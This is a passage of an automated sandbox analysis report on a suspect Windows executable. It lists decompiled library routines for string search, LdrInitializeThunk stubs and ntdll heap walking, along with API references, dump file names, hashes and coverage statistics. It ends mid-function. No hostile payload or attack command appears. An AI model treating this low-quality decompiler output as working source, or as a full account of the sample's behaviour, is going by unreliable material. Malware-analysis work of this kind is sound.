				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004057bb
0x004057bd
0x004057c0
0x004057ec
0x004057c5
0x004057ce
0x004057d3
0x004057de
0x004057e1
0x004057fd
0x004057e3
0x004057ea
0x00000000
0x004057ea
0x004057f6
0x004057fa
0x004057fa
0x004057f4
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059BD,00000000,[Rename]), ref: 004057BB
lstrcmpiA.KERNEL32(?,?), ref: 004057D3
CharNextA.USER32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057E4
lstrlenA.KERNEL32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057ED

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
Instruction ID: 633aa132607d7e7766888a4b0686c97eac652c3b38f96583b17865bee0a85c35
Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
Instruction Fuzzy Hash: D7F06236504518FFD712DBA5DD4099FBBA8EF05350F2540B9E800F7250D674EE01ABA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SC.028UCCP.exePID: 2704, Parent PID: 6716COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	31.8%
Total number of Nodes:	22
Total number of Limit Nodes:	2

Executed Functions

Function 34E92CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92CFA

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bbe32cfaafc3645a79e381b5c5ab70121225d793c9696cec2a94bb4974b5caf
Instruction ID: 1e47dec123160cbb335f0431ac6231ddad8e63431a97704526ac31697b6cdd55
Opcode Fuzzy Hash: 9bbe32cfaafc3645a79e381b5c5ab70121225d793c9696cec2a94bb4974b5caf
Instruction Fuzzy Hash: 1F900221A42041525949B2584505507400667E03857D1C417A1405D10CC936D85AE622

Uniqueness

Uniqueness Score: -1.00%

Function 34E92C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92C5A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e002a829cbb5d2ec17e21ed6e07e9eb03e47ffb384cb62aaf2928cdc9237c461
Instruction ID: d7818aae79be41b554213f4d2882a78e1f2638d92728bf8fc4b59a6bc71a57a8
Opcode Fuzzy Hash: e002a829cbb5d2ec17e21ed6e07e9eb03e47ffb384cb62aaf2928cdc9237c461
Instruction Fuzzy Hash: 33900221B0100003D544725855196064005A7E1345F91D417E0405914CDD25C85A6223

Uniqueness

Uniqueness Score: -1.00%

Function 34E92C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92C3A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc380009086d30df6604b37cd02623d2bcae01dba9a87a408a7d18387d515627
Instruction ID: 65ed30ed0e60ec05eeb069b1f5d2c67b7dc55b6febc864f244f62aba8f3c93bb
Opcode Fuzzy Hash: bc380009086d30df6604b37cd02623d2bcae01dba9a87a408a7d18387d515627
Instruction Fuzzy Hash: 61900229A1300002D5847258550960A000557D1346FD1D81BA0006918CCD25C86D6322

Uniqueness

Uniqueness Score: -1.00%

Function 34E92DC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92DCA

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c467dafd486e4093ce3a8824a30567054219d9458aa88b6d766cdea89295f0a
Instruction ID: 18cbf0f6d519cf8166c69a23ba5a755facb94878ebaae9dea2c1386a595cfd47
Opcode Fuzzy Hash: 0c467dafd486e4093ce3a8824a30567054219d9458aa88b6d766cdea89295f0a
Instruction Fuzzy Hash: 63900271A0100402D54472584505746000557D0345F91C417A5055914ECA69CDD97666

Uniqueness

Uniqueness Score: -1.00%

Function 34E92DA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92DAA

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1b007e910dcc8648d17bd93f0893dd4d4bb2dafb4ef09401135096ca3c5f184
Instruction ID: 38f1073758dcf8f2fdf367a1d52a2c802ad7f2dc968b1f890ae9c15728002153
Opcode Fuzzy Hash: f1b007e910dcc8648d17bd93f0893dd4d4bb2dafb4ef09401135096ca3c5f184
Instruction Fuzzy Hash: 79900221E0100502D50572584505616000A57D0385FD1C427A1015915ECE35C996B132

Uniqueness

Uniqueness Score: -1.00%

Function 34E92D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92D1A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a385301093c61fc171ad65bc72f2616d12d84e67bbe6df28f2da2047db0d9d60
Instruction ID: fd2225f75c02eadfd6a85bb22da3ed3c4cba8a4bcfccc64feac5730ca3331f15
Opcode Fuzzy Hash: a385301093c61fc171ad65bc72f2616d12d84e67bbe6df28f2da2047db0d9d60
Instruction Fuzzy Hash: 2C900231A0100413D51562584605707000957D0385FD1C817A0415918DDA66C956B122

Uniqueness

Uniqueness Score: -1.00%

Function 34E92ED0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92EDA

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4d5edb5ff7a451474d225f4821ba796081665bae0cfed75d96fd6df04c422f9
Instruction ID: d4d42647b23268a2928818a6014983f1efe11d2dc932ce97ed81ed8705e52bf9
Opcode Fuzzy Hash: b4d5edb5ff7a451474d225f4821ba796081665bae0cfed75d96fd6df04c422f9
Instruction Fuzzy Hash: 7A900221E010004245447268894590640057BE1355791C527A0989910DC969C8696666

Uniqueness

Uniqueness Score: -1.00%

Function 34E92EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92EBA

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cbc7794ead8e12476b2cfbe1369bc47f22e2f374a782d5744a7b918a3cb98a9
Instruction ID: 7927169b494c3d6d538d7d5d71ef4e86a3069835bedf376ec0093778cbb6e19c
Opcode Fuzzy Hash: 1cbc7794ead8e12476b2cfbe1369bc47f22e2f374a782d5744a7b918a3cb98a9
Instruction Fuzzy Hash: 33900231A0140402D5046258491570B000557D0346F91C417A1155915DCA35C8557572

Uniqueness

Uniqueness Score: -1.00%

Function 34E92E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92E5A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70bd61e790e7ca87667168035934ddf317d812e59aefd3a4d877e3e422cff449
Instruction ID: 4c0cd47aaff34f58361cbc93b2c0486554c6a046ea99c7778be3f36dbf79b09c
Opcode Fuzzy Hash: 70bd61e790e7ca87667168035934ddf317d812e59aefd3a4d877e3e422cff449
Instruction Fuzzy Hash: B7900261B4100442D50462584515B06000597E1345F91C41BE1055914DCA29CC567127

Uniqueness

Uniqueness Score: -1.00%

Function 34E92F00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92F0A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05ae79072b7bcf48173396257ab8041fed42d2a843d895605c183ece9d6ce9d7
Instruction ID: ae8e67213be22846d33617aa9b0f623f99ccfdc5a772a68bd6637eb54098e8ae
Opcode Fuzzy Hash: 05ae79072b7bcf48173396257ab8041fed42d2a843d895605c183ece9d6ce9d7
Instruction Fuzzy Hash: DD900221A1180042D60466684D15B07000557D0347F91C51BA0145914CCD25C8656522

Uniqueness

Uniqueness Score: -1.00%

Function 34E929F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E929FA

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5b6e520c83ea60a5eb423a3bd94ae22ef341036425ce54194e5c45eb31b3309
Instruction ID: c600841ea783821e2fb7a8feae3c198e7a7c367374e4fb2d1c8e6e098fe083a6
Opcode Fuzzy Hash: c5b6e520c83ea60a5eb423a3bd94ae22ef341036425ce54194e5c45eb31b3309
Instruction Fuzzy Hash: 9C900225A11000030509A6580705507004657D5395391C427F1006910CDA31C8656122

Uniqueness

Uniqueness Score: -1.00%

Function 34E92A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92A8A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0abb66397bc5bde8d47019a5ca7c1ff2a8c1486f5530a1793a9d5c7297aa90d8
Instruction ID: afeb00affe390741fd556e3207e524922b4ba803f07d2d7177a0012556b53e25
Opcode Fuzzy Hash: 0abb66397bc5bde8d47019a5ca7c1ff2a8c1486f5530a1793a9d5c7297aa90d8
Instruction Fuzzy Hash: B8900261A0200003450972584515616400A57E0345B91C427E1005950DC935C8957126

Uniqueness

Uniqueness Score: -1.00%

Function 34E92BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92BCA

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 688e9872b4a99f80c41624fecfe8c8f7312b816840f092ddd5174dd85a6195e0
Instruction ID: b7d93510543085cec4c2b5b3fdfed167cf33baa9d0f87e7d4c86bd12ca627391
Opcode Fuzzy Hash: 688e9872b4a99f80c41624fecfe8c8f7312b816840f092ddd5174dd85a6195e0
Instruction Fuzzy Hash: 6A900231A0100402D50466985509646000557E0345F91D417A5015915ECA75C8957132

Uniqueness

Uniqueness Score: -1.00%

Function 34E92B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92B9A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5edbe407dceb61d00c7b1175c9df17da9743115c3194fdc173cdd281ca6d3800
Instruction ID: 0ca6ee6a703c1f285a1f8e2cac3e3310dcac54048900de2450158df4a89e4369
Opcode Fuzzy Hash: 5edbe407dceb61d00c7b1175c9df17da9743115c3194fdc173cdd281ca6d3800
Instruction Fuzzy Hash: EA900231A0108802D5146258850574A000557D0345F95C817A4415A18DCAA5C8957122

Uniqueness

Uniqueness Score: -1.00%

Function 34E92B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 34E92B1A

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e43107a661a80a283f8719167b2be4661315adc05d05d4e4b3905c1fa04d9108
Instruction ID: a2b29a030d53004bc31e0ee7e657ce1691ef57f147b0ccc4b604def3be50750b
Opcode Fuzzy Hash: e43107a661a80a283f8719167b2be4661315adc05d05d4e4b3905c1fa04d9108
Instruction Fuzzy Hash: 56900231A0100802D5847258450564A000557D1345FD1C41BA0016A14DCE25CA5D77A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 34EF9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558
timeCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E34EF9060(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v18;
				short _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v184;
				signed int _v188;
				short _v190;
				short _v192;
				signed int _v196;
				signed int _v198;
				signed int _v200;
				signed int _v204;
				signed int _v206;
				void _v208;
				signed int* _v212;
				signed int _v214;
				void* _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				char _v233;
				char _v236;
				signed int _v240;
				signed int _v241;
				intOrPtr* _v244;
				intOrPtr _v248;
				signed int _v249;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t299;
				signed int _t310;
				signed int _t315;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				char* _t323;
				signed int _t325;
				signed int _t329;
				signed int _t333;
				signed int* _t334;
				signed int _t349;
				signed int _t352;
				signed int _t357;
				signed int _t367;
				signed int _t373;
				intOrPtr _t422;
				signed int _t423;
				signed int _t424;
				void* _t427;
				signed int _t429;
				signed int _t431;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr _t444;
				signed int _t448;
				signed int _t452;
				void _t458;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t472;
				intOrPtr _t475;
				intOrPtr _t478;
				signed int _t480;
				intOrPtr* _t484;
				void* _t485;
				intOrPtr _t488;
				intOrPtr _t489;
				signed int _t492;
				signed int _t495;
				signed int _t496;
				signed int _t499;
				void* _t500;
				signed int _t501;
				signed int _t503;

				_t503 = (_t501 & 0xfffffff8) - 0xec;
				_v8 =  *0x34f4b370 ^ _t503;
				_t299 = _a8;
				_t499 = _a4;
				_t434 = 0;
				_t482 =  *_t299;
				_t484 =  *((intOrPtr*)(_t299 + 4));
				_v204 = _t482;
				_v232 =  *((intOrPtr*)(_t299 + 8));
				_v228 = _t484;
				_v68 = 0;
				if( *((intOrPtr*)(_t499 + 8)) != 0xddeeddee) {
					__eflags =  *(_t499 + 0x44) & 0x01000000;
					_v233 = 0;
					_v212 = 0;
					if(( *(_t499 + 0x44) & 0x01000000) == 0) {
						goto L2;
					} else {
						_t310 = 0xc0000002;
						goto L98;
					}
				} else {
					_v233 = 1;
					_v212 = _t499;
					L2:
					if(_t482 != 0x80000000) {
						E34E98F40( &_v156, _t434, 0x54);
						_t503 = _t503 + 0xc;
						_v172 = 2;
						_v168 = 0x20;
						_v164 = _t499;
						__eflags = _v233 - _t434;
						if(_v233 != _t434) {
							_t444 = _v212;
							_v160 = _t434;
							_v156 =  *(_t444 + 0x80) << 0xc;
							_v156 = _v156 + ( *(_t444 + 0x4c) << 0xc);
							_v152 =  *(_t444 + 0x84) << 0xc;
							_t81 =  &_v152;
							 *_t81 = _v152 + ( *(_t444 + 0x50) << 0xc);
							__eflags =  *_t81;
							_t310 = _t434;
						} else {
							_t482 =  &_v156;
							_v160 =  *(_t499 + 0xea) & 0x000000ff;
							_t310 = E34EF98AA(_t499,  &_v156,  &_v152);
						}
						__eflags = _t310;
						if(_t310 < 0) {
							L98:
							_pop(_t485);
							_pop(_t500);
							_pop(_t435);
							return L34E94B50(_t310, _t435, _v8 ^ _t503, _t482, _t485, _t500);
						} else {
							 *0x34f491e0( &_v172, _v232);
							_t310 =  *_t484();
							__eflags = _t310;
							if(_t310 < 0) {
								goto L98;
							}
							_t482 = _v212;
							__eflags = _t482 - 3;
							if(_t482 < 3) {
								goto L98;
							}
							_v232 = _t434;
							__eflags = _t482 - 3;
							_v228 = _t434;
							_t448 = 7;
							_t315 = memset( &_v208, 0, _t448 << 2);
							_t503 = _t503 + 0xc;
							_t316 = _t315 & 0xffffff00 | __eflags > 0x00000000;
							_t488 = 0;
							__eflags = 0;
							_v224 = _t316;
							while(1) {
								_t482 =  &_v208;
								_t310 = E34EFA388(_t499,  &_v208, _t316);
								__eflags = _t310 - 0x8000001a;
								if(_t310 == 0x8000001a) {
									break;
								}
								__eflags = _t310;
								if(_t310 < 0) {
									goto L98;
								}
								_t436 = _v198;
								__eflags = _t436 & 0x00000002;
								if((_t436 & 0x00000002) == 0) {
									__eflags = _t436 & 0x00004000;
									if((_t436 & 0x00004000) == 0) {
										__eflags = _t436 & 0x00001000;
										if((_t436 & 0x00001000) == 0) {
											__eflags = _v241;
											if(_v241 != 0) {
												L75:
												__eflags = _v212 - 4;
												_t316 = _v224;
												if(_v212 < 4) {
													continue;
												}
												L76:
												__eflags = _t436 & 0x000000f0;
												if((_t436 & 0x000000f0) == 0) {
													E34E98F40( &_v180, _t488, 0x64);
													_t503 = _t503 + 0xc;
													_v172 = _v208;
													_v164 = _v204;
													_t321 = _v188;
													_v180 = 5;
													_v176 = 0x1c;
													__eflags = _t436 & 0x00000002;
													if((_t436 & 0x00000002) != 0) {
														_t321 = _v200 & 0x000000ff;
													}
													_v160 = _t321;
													__eflags = _t436 & 0x00000001;
													if((_t436 & 0x00000001) == 0) {
														_t322 = _v168;
													} else {
														_t322 = 1;
														_v168 = 1;
													}
													__eflags = _t436 & 0x00004000;
													if((_t436 & 0x00004000) == 0) {
														__eflags = _t436 & 0x00008000;
														if((_t436 & 0x00008000) == 0) {
															goto L94;
														}
														_t325 = _t322 | 0x00000008;
														__eflags = _t325;
														goto L93;
													} else {
														_t325 = _t322 | 0x00000004;
														L93:
														_v168 = _t325;
														L94:
														_t323 =  &_v180;
														L95:
														 *0x34f491e0(_t323, _v240);
														_t310 =  *_v236();
														__eflags = _t310;
														if(_t310 < 0) {
															goto L98;
														}
														L96:
														_t316 = _v232;
														continue;
													}
												}
												_t452 = _v188;
												_v56 = _v208;
												_v48 = _v204;
												_t329 = 2;
												_v40 = _t488;
												_v36 = _t488;
												_v64 = 5;
												_v60 = 0x30;
												_v52 = _t329;
												__eflags = _t329 & _t436;
												if((_t329 & _t436) != 0) {
													_t452 = _v200 & 0x000000ff;
												}
												_v44 = _t452;
												__eflags = _t436 & 0x00004000;
												if((_t436 & 0x00004000) != 0) {
													_t329 = 6;
													_v52 = _t329;
												}
												__eflags = _t436 & 0x00000001;
												if((_t436 & 0x00000001) != 0) {
													_t333 = _t329 | 0x00000001;
													__eflags = _t333;
													_v52 = _t333;
												}
												_v24 = _v196;
												_v20 = _v192;
												_v18 = _v190;
												_t323 =  &_v64;
												_v32 = 1;
												_v28 = 0x14;
												goto L95;
											}
											_t334 = _v208;
											__eflags = _t334 - _v232;
											if(_t334 < _v232) {
												L72:
												_t482 = _t334;
												E34EF8093(_v76, _t334,  &_v232,  &_v228,  &_v68,  &_v216);
												__eflags = _v228 - 4;
												if(_v228 < 4) {
													goto L96;
												}
												E34E98F40( &_v180, _t488, 0x64);
												_t458 = _v232;
												_t503 = _t503 + 0xc;
												_v168 = _v228 - _t458;
												_v160 = _v216;
												_v172 = _t458;
												_v180 = 4;
												_v176 = 0x20;
												_v164 = 1;
												 *0x34f491e0( &_v180, _v240);
												_t310 =  *_v236();
												__eflags = _t310;
												if(_t310 < 0) {
													goto L98;
												}
												_t436 = _v206;
												goto L75;
											}
											__eflags = _t334 - _v228;
											if(_t334 <= _v228) {
												goto L75;
											}
											goto L72;
										}
										__eflags = _v212 - 4;
										_t316 = _v224;
										if(_v212 < 4) {
											continue;
										}
										E34E98F40( &_v180, _t488, 0x64);
										_t503 = _t503 + 0xc;
										_v172 = _v208;
										_t325 = _v204;
										_v180 = 4;
										_v176 = 0x20;
										_v164 = 2;
										_v160 = 1;
										goto L93;
									}
									E34E98F40( &_v172, 0, 0x5c);
									_t503 = _t503 + 0xc;
									_v180 = 3;
									_t496 = 0;
									_v176 = 0x1c;
									_v72 = 0;
									__eflags = _v241;
									if(_v241 != 0) {
										_t482 = _v208;
										_t349 = _v220 + 0x44;
										_v172 = _t482;
										__eflags =  *(_t349 + 4) & 0x00000001;
										_t496 =  *_t349;
										if(( *(_t349 + 4) & 0x00000001) != 0) {
											__eflags = _t496;
											if(_t496 == 0) {
												_t496 = 0;
											} else {
												_t496 = _t496 ^ _t349;
											}
										}
										_t461 =  *(_t349 + 4) & 1;
										while(1) {
											__eflags = _t496;
											if(_t496 == 0) {
												break;
											}
											__eflags = _t482 - ( *(_t496 + 0xc) & 0xffff0000);
											if(__eflags < 0) {
												_t352 =  *_t496;
												L54:
												__eflags = _t461;
												if(_t461 == 0) {
													L57:
													_t496 = _t352;
													continue;
												}
												__eflags = _t352;
												if(_t352 == 0) {
													goto L57;
												}
												_t496 = _t496 ^ _t352;
												continue;
											}
											if(__eflags <= 0) {
												break;
											}
